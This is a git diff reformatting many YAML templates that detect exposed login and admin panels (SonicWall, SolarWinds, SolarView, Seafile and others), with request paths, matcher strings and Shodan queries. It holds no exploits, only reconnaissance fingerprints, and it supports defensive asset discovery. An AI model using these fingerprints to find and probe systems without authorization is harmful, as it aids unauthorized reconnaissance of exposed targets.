6fa43c82b7..b8e4ccdbba 100644 --- a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml @@ -8,8 +8,8 @@ info: - https://www.scriptcase.com.br - https://www.scriptcase.net metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"ScriptCase" tags: panel,scriptcase @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/scriptcase/prod/lib/php/" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/exposed-panels/scs-landfill-control.yaml b/http/exposed-panels/scs-landfill-control.yaml index e3a177fe4f..ba4913d6a7 100644 --- a/http/exposed-panels/scs-landfill-control.yaml +++ b/http/exposed-panels/scs-landfill-control.yaml @@ -9,11 +9,11 @@ info: - https://www.scsengineers.com/services/remote-monitoring-control/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,scs,rmc,iot metadata: max-request: 1 + tags: panel,scs,rmc,iot http: - method: GET @@ -21,11 +21,13 @@ http: - "{{BaseURL}}" host-redirects: true + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Log in to SCS RMC®" diff --git a/http/exposed-panels/seafile-panel.yaml b/http/exposed-panels/seafile-panel.yaml index c7ae099709..590073086e 100644 --- a/http/exposed-panels/seafile-panel.yaml +++ b/http/exposed-panels/seafile-panel.yaml @@ -10,12 +10,12 @@ info: - https://github.com/haiwen/seafile classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1552322396 - verified: true tags: sefile,panel,login http: @@ -25,6 +25,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: dsl diff --git a/http/exposed-panels/seagate-nas-login.yaml b/http/exposed-panels/seagate-nas-login.yaml index b0d95bffbe..301beea872 100644 --- a/http/exposed-panels/seagate-nas-login.yaml +++ b/http/exposed-panels/seagate-nas-login.yaml @@ -7,8 +7,8 @@ info: description: | Seagate NAS - SEAGATE Login was detected. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Seagate NAS - SEAGATE" tags: panel,seagate,login diff --git a/http/exposed-panels/seats-login.yaml b/http/exposed-panels/seats-login.yaml index 5a2cebce47..135074ec25 100644 --- a/http/exposed-panels/seats-login.yaml +++ b/http/exposed-panels/seats-login.yaml @@ -7,11 +7,11 @@ info: description: Seats login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET @@ -23,6 +23,7 @@ http: - type: word words: - "seats.io | login" + - type: status status: - 200 diff --git a/http/exposed-panels/secmail-detect.yaml b/http/exposed-panels/secmail-detect.yaml index 01f9e54d31..b78e54353f 100644 --- a/http/exposed-panels/secmail-detect.yaml +++ b/http/exposed-panels/secmail-detect.yaml @@ -7,7 +7,7 @@ info: description: SecMail login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/secnet-ac-panel.yaml b/http/exposed-panels/secnet-ac-panel.yaml index 3c2a9b04b7..d4e9332c98 100644 --- a/http/exposed-panels/secnet-ac-panel.yaml +++ b/http/exposed-panels/secnet-ac-panel.yaml @@ -7,11 +7,11 @@ info: description: SecNet login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: secnet-ac,panel metadata: max-request: 1 + tags: secnet-ac,panel http: - method: GET diff --git a/http/exposed-panels/secure-login-panel.yaml b/http/exposed-panels/secure-login-panel.yaml index 48abdd60e4..de62bf42a0 100644 --- a/http/exposed-panels/secure-login-panel.yaml +++ b/http/exposed-panels/secure-login-panel.yaml @@ -7,7 +7,7 @@ info: description: Secure Login Service login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/securenvoy-panel.yaml b/http/exposed-panels/securenvoy-panel.yaml index c14ea624fc..c1eb22dd21 100644 --- a/http/exposed-panels/securenvoy-panel.yaml +++ b/http/exposed-panels/securenvoy-panel.yaml @@ -7,11 +7,11 @@ info: description: SecurEnvoy admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,securenvoy metadata: max-request: 1 + tags: panel,securenvoy http: - method: GET diff --git a/http/exposed-panels/securepoint-utm.yaml b/http/exposed-panels/securepoint-utm.yaml index 1b149c1e36..b4b0da90b2 100644 --- a/http/exposed-panels/securepoint-utm.yaml +++ b/http/exposed-panels/securepoint-utm.yaml @@ -7,7 +7,7 @@ info: description: Securepoint UTM admin panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/securityspy-detect.yaml b/http/exposed-panels/securityspy-detect.yaml index 5399c3db73..85b00117c9 100644 --- a/http/exposed-panels/securityspy-detect.yaml +++ b/http/exposed-panels/securityspy-detect.yaml @@ -7,7 +7,7 @@ info: description: SecuritySpy Camera panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/seeddms-panel.yaml b/http/exposed-panels/seeddms-panel.yaml index f343bebbbe..6ab20fe95c 100644 --- a/http/exposed-panels/seeddms-panel.yaml +++ b/http/exposed-panels/seeddms-panel.yaml @@ -7,7 +7,7 @@ info: description: SeedDMS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -23,6 +23,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/selenium-grid.yaml b/http/exposed-panels/selenium-grid.yaml index dac0e91ff2..85db73b018 100644 --- a/http/exposed-panels/selenium-grid.yaml +++ b/http/exposed-panels/selenium-grid.yaml @@ -7,7 +7,7 @@ info: description: Selenium Grid panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/selenoid-ui-exposure.yaml b/http/exposed-panels/selenoid-ui-exposure.yaml index 23af8354d3..22c4ae9143 100644 --- a/http/exposed-panels/selenoid-ui-exposure.yaml +++ b/http/exposed-panels/selenoid-ui-exposure.yaml @@ -7,16 +7,17 @@ info: description: Selenoid UI login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET path: - '{{BaseURL}}/admin/login' + matchers: - type: word words: diff --git a/http/exposed-panels/selfcheck-panel.yaml b/http/exposed-panels/selfcheck-panel.yaml index 01c9747f55..5f202be9b4 100644 --- a/http/exposed-panels/selfcheck-panel.yaml +++ b/http/exposed-panels/selfcheck-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=607747024729154&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SelfCheck System Manager" tags: panel,login,selfcheck,systemmanager @@ -28,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/sensu-panel.yaml b/http/exposed-panels/sensu-panel.yaml index b8a8503c1a..0a25b26db1 100644 --- a/http/exposed-panels/sensu-panel.yaml +++ b/http/exposed-panels/sensu-panel.yaml @@ -8,11 +8,11 @@ info: Sensu by Sumo Logic login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-749942143 tags: panel,sensu,sumo,detect diff --git a/http/exposed-panels/sentinelone-console.yaml b/http/exposed-panels/sentinelone-console.yaml index 68c6d7acac..82e1268fe9 100644 --- a/http/exposed-panels/sentinelone-console.yaml +++ b/http/exposed-panels/sentinelone-console.yaml @@ -7,11 +7,11 @@ info: description: SentinelOne Management Console login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SentinelOne - Management Console" tags: panel,sentinelone diff --git a/http/exposed-panels/sequoiadb-login.yaml b/http/exposed-panels/sequoiadb-login.yaml index edc2078432..a31f6a2396 100644 --- a/http/exposed-panels/sequoiadb-login.yaml +++ b/http/exposed-panels/sequoiadb-login.yaml @@ -7,7 +7,7 @@ info: description: SequoiaDB login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/server-backup-login.yaml b/http/exposed-panels/server-backup-login.yaml index e455b1f593..08807bd5b3 100644 --- a/http/exposed-panels/server-backup-login.yaml +++ b/http/exposed-panels/server-backup-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6949 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: paneil,idera,edb metadata: max-request: 1 + tags: paneil,idera,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'Idera Server Backup Manager SE ' + - type: status status: - 200 diff --git a/http/exposed-panels/server-backup-manager-se.yaml b/http/exposed-panels/server-backup-manager-se.yaml index a2558994cb..60b7fd36a5 100644 --- a/http/exposed-panels/server-backup-manager-se.yaml +++ b/http/exposed-panels/server-backup-manager-se.yaml @@ -7,7 +7,7 @@ info: description: Server Backup Manager SE login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/servicedesk-login-panel.yaml b/http/exposed-panels/servicedesk-login-panel.yaml index 15a2d15084..816be21d69 100644 --- a/http/exposed-panels/servicedesk-login-panel.yaml +++ b/http/exposed-panels/servicedesk-login-panel.yaml @@ -7,7 +7,7 @@ info: description: Jira Service Desk login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 diff --git a/http/exposed-panels/sevone-nms-network-manager.yaml b/http/exposed-panels/sevone-nms-network-manager.yaml index 14d25d7f54..a0812d0135 100644 --- a/http/exposed-panels/sevone-nms-network-manager.yaml +++ b/http/exposed-panels/sevone-nms-network-manager.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"SevOne NMS - Network Manager" tags: sevone,manager,login,panel @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/sgp-login-panel.yaml b/http/exposed-panels/sgp-login-panel.yaml index bdc50f20bf..ddc01b2344 100644 --- a/http/exposed-panels/sgp-login-panel.yaml +++ b/http/exposed-panels/sgp-login-panel.yaml @@ -7,7 +7,7 @@ info: description: SGP login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/shardingsphere-panel.yaml b/http/exposed-panels/shardingsphere-panel.yaml index 69a17972a8..7b3f8b0721 100644 --- a/http/exposed-panels/shardingsphere-panel.yaml +++ b/http/exposed-panels/shardingsphere-panel.yaml @@ -8,12 +8,11 @@ info: classification: cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:816588900 - verified: true tags: panel,shardingsphere,login - http: - method: GET path: @@ -21,6 +20,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/sharecenter-login.yaml b/http/exposed-panels/sharecenter-login.yaml index 8d9ad37ba3..06a3e028cb 100644 --- a/http/exposed-panels/sharecenter-login.yaml +++ b/http/exposed-panels/sharecenter-login.yaml @@ -9,16 +9,17 @@ info: - https://www.exploit-db.com/ghdb/6892 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: edb,panel,login metadata: max-request: 1 + tags: edb,panel,login http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: diff --git a/http/exposed-panels/sharefile-panel.yaml b/http/exposed-panels/sharefile-panel.yaml index 7a7478d42d..760c454ca1 100644 --- a/http/exposed-panels/sharefile-panel.yaml +++ b/http/exposed-panels/sharefile-panel.yaml @@ -10,8 +10,8 @@ info: - https://www.sharefile.com/ metadata: verified: true - shodan-query: title:"ShareFile Login" max-request: 1 + shodan-query: title:"ShareFile Login" tags: sharefile,login,panel,detect http: diff --git a/http/exposed-panels/shell-box.yaml b/http/exposed-panels/shell-box.yaml index 7bee6f3a66..3d5c01c7c8 100644 --- a/http/exposed-panels/shell-box.yaml +++ b/http/exposed-panels/shell-box.yaml @@ -11,8 +11,8 @@ info: - https://www.cvedetails.com/vulnerability-list/vendor_id-15771/product_id-33062/Shellinabox-Project-Shellinabox.html metadata: verified: true - shodan-query: http.favicon.hash:-629968763 max-request: 1 + shodan-query: http.favicon.hash:-629968763 tags: shell,emulator,detect,panel,login http: @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/shoutcast-server.yaml b/http/exposed-panels/shoutcast-server.yaml index 3f15e90f31..a5872f3a9f 100644 --- a/http/exposed-panels/shoutcast-server.yaml +++ b/http/exposed-panels/shoutcast-server.yaml @@ -7,7 +7,7 @@ info: description: SHOUTcast Server panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/sicom-panel.yaml b/http/exposed-panels/sicom-panel.yaml index 259584f01b..72fac81b3c 100644 --- a/http/exposed-panels/sicom-panel.yaml +++ b/http/exposed-panels/sicom-panel.yaml @@ -8,16 +8,17 @@ info: Sicom MGRNG administrative login page found. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-668 - tags: sicom,mgrng,panel metadata: max-request: 1 + tags: sicom,mgrng,panel http: - method: GET path: - "{{BaseURL}}/~sicom/mgrng/LoginForm.php" + matchers-condition: and matchers: - type: status diff --git a/http/exposed-panels/sidekiq-dashboard.yaml b/http/exposed-panels/sidekiq-dashboard.yaml index 9216f2ab5e..4bbac931c0 100644 --- a/http/exposed-panels/sidekiq-dashboard.yaml +++ b/http/exposed-panels/sidekiq-dashboard.yaml @@ -24,6 +24,7 @@ http: redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/signet-explorer-dashboard.yaml b/http/exposed-panels/signet-explorer-dashboard.yaml index a1b3552be9..40ab726f2d 100644 --- a/http/exposed-panels/signet-explorer-dashboard.yaml +++ b/http/exposed-panels/signet-explorer-dashboard.yaml @@ -9,11 +9,11 @@ info: - https://github.com/mempool/mempool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"mempool-space" || title:"Signet Explorer" tags: panel,signet,bitcoin,dashboard diff --git a/http/exposed-panels/sitecore-login.yaml b/http/exposed-panels/sitecore-login.yaml index 0d0483cefa..866483feac 100644 --- a/http/exposed-panels/sitecore-login.yaml +++ b/http/exposed-panels/sitecore-login.yaml @@ -7,7 +7,7 @@ info: description: Sitecore login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/sitefinity-login.yaml b/http/exposed-panels/sitefinity-login.yaml index 75710a8a08..089194c04b 100644 --- a/http/exposed-panels/sitefinity-login.yaml +++ b/http/exposed-panels/sitefinity-login.yaml @@ -7,9 +7,9 @@ info: description: This template identifies the Sitefinity login page. reference: - https://www.exploit-db.com/ghdb/6722 - tags: sitefinity,edb,panel metadata: max-request: 1 + tags: sitefinity,edb,panel http: - method: GET @@ -21,6 +21,7 @@ http: - type: word words: - 'Telerik.Sitefinity.Web.UI.UserPreferences' + - type: status status: - 200 diff --git a/http/exposed-panels/siteomat-login.yaml b/http/exposed-panels/siteomat-login.yaml index 78ac21faea..2c4373042f 100644 --- a/http/exposed-panels/siteomat-login.yaml +++ b/http/exposed-panels/siteomat-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6624 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: siteomat,login,edb,panel metadata: max-request: 1 + tags: siteomat,login,edb,panel http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'SiteOmat Login' + - type: status status: - 200 diff --git a/http/exposed-panels/skycaiji-admin-panel.yaml b/http/exposed-panels/skycaiji-admin-panel.yaml index 4e8f7a0de1..9aaac2b5aa 100644 --- a/http/exposed-panels/skycaiji-admin-panel.yaml +++ b/http/exposed-panels/skycaiji-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: SkyCaiji admin panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,tech,skycaiji metadata: max-request: 1 + tags: panel,tech,skycaiji http: - method: GET @@ -20,7 +20,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/slocum-login.yaml b/http/exposed-panels/slocum-login.yaml index 4827dfb7c1..17018e107c 100644 --- a/http/exposed-panels/slocum-login.yaml +++ b/http/exposed-panels/slocum-login.yaml @@ -7,11 +7,11 @@ info: description: Slocum Fleet Mission Control login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,tech,slocum metadata: max-request: 1 + tags: panel,tech,slocum http: - method: GET diff --git a/http/exposed-panels/smartping-dashboard.yaml b/http/exposed-panels/smartping-dashboard.yaml index 2a2e2e9c76..c16fd31041 100644 --- a/http/exposed-panels/smartping-dashboard.yaml +++ b/http/exposed-panels/smartping-dashboard.yaml @@ -7,11 +7,11 @@ info: description: SmartPing Dashboard panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SmartPing Dashboard" tags: panel,misconfig,unauth,smartping @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/snapcomms-panel.yaml b/http/exposed-panels/snapcomms-panel.yaml index 1dde065c43..79dfe2d051 100644 --- a/http/exposed-panels/snapcomms-panel.yaml +++ b/http/exposed-panels/snapcomms-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.snapcomms.com/ metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,snapcomms,login,detect http: diff --git a/http/exposed-panels/solarview-compact-panel.yaml b/http/exposed-panels/solarview-compact-panel.yaml index 2be343ef56..6093b6f6f0 100644 --- a/http/exposed-panels/solarview-compact-panel.yaml +++ b/http/exposed-panels/solarview-compact-panel.yaml @@ -7,11 +7,11 @@ info: description: SolarView Compact panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"SolarView Compact" tags: panel,solarview,iot @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/solarwinds-orion.yaml b/http/exposed-panels/solarwinds-orion.yaml index d3cc968bcf..6d7e18a224 100644 --- a/http/exposed-panels/solarwinds-orion.yaml +++ b/http/exposed-panels/solarwinds-orion.yaml @@ -7,11 +7,11 @@ info: description: SolarWinds Orion login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,solarwinds metadata: max-request: 1 + tags: panel,solarwinds http: - method: GET diff --git a/http/exposed-panels/solarwinds-servuftp-detect.yaml b/http/exposed-panels/solarwinds-servuftp-detect.yaml index 0cc7c2e1f9..dffeb09a8d 100644 --- a/http/exposed-panels/solarwinds-servuftp-detect.yaml +++ b/http/exposed-panels/solarwinds-servuftp-detect.yaml @@ -7,19 +7,19 @@ info: description: SolarWinds Serv-U File Server panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: solarwinds,panel metadata: max-request: 1 + tags: solarwinds,panel http: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - - type: regex part: header regex: diff --git a/http/exposed-panels/solr-panel-exposure.yaml b/http/exposed-panels/solr-panel-exposure.yaml index d4050b7b1b..90609bd26b 100644 --- a/http/exposed-panels/solr-panel-exposure.yaml +++ b/http/exposed-panels/solr-panel-exposure.yaml @@ -7,11 +7,11 @@ info: description: Apache Solr admin panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"Solr Admin" tags: panel,solr,apache,admin @@ -22,6 +22,7 @@ http: - '{{BaseURL}}' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/somansa-dlp-detect.yaml b/http/exposed-panels/somansa-dlp-detect.yaml index 7c4bdab1ef..1aaecdd444 100644 --- a/http/exposed-panels/somansa-dlp-detect.yaml +++ b/http/exposed-panels/somansa-dlp-detect.yaml @@ -9,11 +9,11 @@ info: - https://www.somansa.com/solution/integrated_solution/dlp/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"DLP system" tags: panel,somansa,dlp @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/DLPCenter/images/favicon.ico" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/exposed-panels/somfy-login.yaml b/http/exposed-panels/somfy-login.yaml index d448cc64b7..bef3028add 100644 --- a/http/exposed-panels/somfy-login.yaml +++ b/http/exposed-panels/somfy-login.yaml @@ -7,11 +7,11 @@ info: description: Somfy login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,login metadata: max-request: 1 + tags: panel,login http: - method: GET diff --git a/http/exposed-panels/sonarqube-login.yaml b/http/exposed-panels/sonarqube-login.yaml index bddc786945..61fbbc6d16 100644 --- a/http/exposed-panels/sonarqube-login.yaml +++ b/http/exposed-panels/sonarqube-login.yaml @@ -7,11 +7,11 @@ info: description: SonarQube panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,sonarqube metadata: max-request: 1 + tags: panel,sonarqube http: - method: GET diff --git a/http/exposed-panels/sonic-wall-application.yaml b/http/exposed-panels/sonic-wall-application.yaml index de8258646c..1e55600ca0 100644 --- a/http/exposed-panels/sonic-wall-application.yaml +++ b/http/exposed-panels/sonic-wall-application.yaml @@ -7,11 +7,11 @@ info: description: SonicWall Appliance Management Console login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Appliance Management Console Login" tags: panel,sonicwall,login diff --git a/http/exposed-panels/sonic-wall-login.yaml b/http/exposed-panels/sonic-wall-login.yaml index 24700689db..9c6b3e08db 100644 --- a/http/exposed-panels/sonic-wall-login.yaml +++ b/http/exposed-panels/sonic-wall-login.yaml @@ -6,8 +6,8 @@ info: severity: info description: SonicWall Network Security Login panel was detected. metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"SonicWall Network Security Login" tags: panel,sonicwall,login @@ -20,6 +20,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/sonicwall-analyzer-login.yaml b/http/exposed-panels/sonicwall-analyzer-login.yaml index 174d8e5784..0205887015 100644 --- a/http/exposed-panels/sonicwall-analyzer-login.yaml +++ b/http/exposed-panels/sonicwall-analyzer-login.yaml @@ -7,11 +7,11 @@ info: description: SonicWall Analyzer login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SonicWall Analyzer Login" tags: panel,sonicwall diff --git a/http/exposed-panels/sonicwall-management-panel.yaml b/http/exposed-panels/sonicwall-management-panel.yaml index dacf7ca71a..381619a8ac 100644 --- a/http/exposed-panels/sonicwall-management-panel.yaml +++ b/http/exposed-panels/sonicwall-management-panel.yaml @@ -7,16 +7,17 @@ info: description: SonicWall Management admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,sonicwall metadata: max-request: 1 + tags: panel,sonicwall http: - method: GET path: - "{{BaseURL}}/auth.html" + matchers: - type: word words: diff --git a/http/exposed-panels/sonicwall-sslvpn-panel.yaml b/http/exposed-panels/sonicwall-sslvpn-panel.yaml index 0c68458101..19140907a8 100644 --- a/http/exposed-panels/sonicwall-sslvpn-panel.yaml +++ b/http/exposed-panels/sonicwall-sslvpn-panel.yaml @@ -7,11 +7,11 @@ info: description: SonicWall Virtual Office SSL VPN login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,sonicwall metadata: max-request: 1 + tags: panel,sonicwall http: - method: GET diff --git a/http/exposed-panels/sophos-fw-version-detect.yaml b/http/exposed-panels/sophos-fw-version-detect.yaml index 7a538ad49e..482aaac1ce 100644 --- a/http/exposed-panels/sophos-fw-version-detect.yaml +++ b/http/exposed-panels/sophos-fw-version-detect.yaml @@ -7,11 +7,11 @@ info: description: Sophos Firewall login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Sophos" tags: panel,sophos @@ -22,9 +22,9 @@ http: - "{{BaseURL}}/userportal/webpages/myaccount/login.jsp" stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/sophos-mobile-panel.yaml b/http/exposed-panels/sophos-mobile-panel.yaml index 